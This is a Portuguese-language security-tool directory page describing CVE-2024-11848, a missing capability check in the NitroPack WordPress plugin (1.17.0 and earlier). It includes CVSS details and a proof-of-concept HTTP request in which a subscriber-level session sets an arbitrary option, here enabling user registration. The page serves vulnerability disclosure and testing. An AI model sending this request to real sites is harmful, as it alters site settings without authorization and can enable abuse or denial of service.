Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-11848 — NitroPack <= 1.17.0 - Falta de Autorização para Atualização Limitada de Opções Autenticada (Subscriber+) | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/cve-2024-11848
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoConfiguração Incorreta
GitHubrandomrobbiebf/cve-2024-11848

CVE-2024-11848

NitroPack <= 1.17.0 - Falta de Autorização para Atualização Limitada de Opções Autenticada (Subscriber+)

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-11848

NitroPack <= 1.17.0 - Autorização Ausente para Atualização Limitada de Opções por Autenticados (Assinante+)

Descrição

O plugin NitroPack para WordPress é vulnerável a modificação não autorizada de dados devido a uma verificação de capacidade ausente na ação AJAX 'nitropack_dismiss_notice_forever' em todas as versões até, e incluindo, 1.17.0. Isso possibilita que atacantes autenticados, com acesso de nível de assinante e superior, atualizem opções arbitrárias para um valor fixo de '1', o que pode ativar certas opções (por exemplo, ativar registro de usuários) ou modificar certas opções de forma que leve a uma condição de negação de serviço.

Detalhes

  • Tipo: plugin
  • Slug: nitropack
  • Versão Afetada: 1.17.0
  • Pontuação CVSS: 8.1
  • Classificação CVSS: Alta
  • Vetor CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
  • CVE: CVE-2024-11848
  • Status: Ativo

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_f0174336378e6db874da2237e8c05ac1=subscriber%7C1737110766%7CYhdLxJv5qLyqmSVznKzPOC94NyU9PAMWPeef9cCtINN%7C8c6d11f15397dfb790e700f695c7480bb8267c86130c402afce6080076ccff2d
Content-Length: 88

action=nitropack_dismiss_notice_forever&security=92f60ea3ea&notice_id=users_can_register
Baixar ferramenta